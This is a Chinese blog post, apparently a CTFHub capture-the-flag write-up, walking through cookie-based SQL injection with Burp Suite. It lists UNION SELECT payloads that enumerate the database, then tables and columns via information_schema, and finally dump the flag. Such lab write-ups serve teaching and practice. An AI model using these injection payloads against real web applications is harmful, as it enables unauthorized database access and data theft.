热门

最新

红包

立Flag

投票

同城

我的

发布
m0_63788194
YYX*
4 年前
truem0_63788194

cookie注入
Burpsuite手动注入 ● 先创造环境,再用burp suite抓包
● 将点击action-send to repeater,得到ID=1
● 在cookie中注入id=123+union+select+database(),2#,找到数据库;得到ID:sqli
● 再注入id=123 union select group_concat(table_name),2 from information_schema.tables where table_schema= 'sqli' # ;得到数据表名:ejptyugwdy。
● 再注入id=123+union+select+group_concat(column_name),2 from information_schema.columns where table_schema= 'sqli'and table_name ='ejptyugwdy' # ,得到数据的列名:rpuszfctgg
● 在注入id=123+union+select+group_concat(rpuszfctgg),2 from ejptyugwdy #; ● 最终得到flag:ctfhub{aedfb2dce32cf14f8fc1e5f7}

CSDN App 扫码分享
分享
评论
点赞
打赏
  • 复制链接
  • 举报
下一条:
用Apache部署静态网站及SELinux安全子系统
立即登录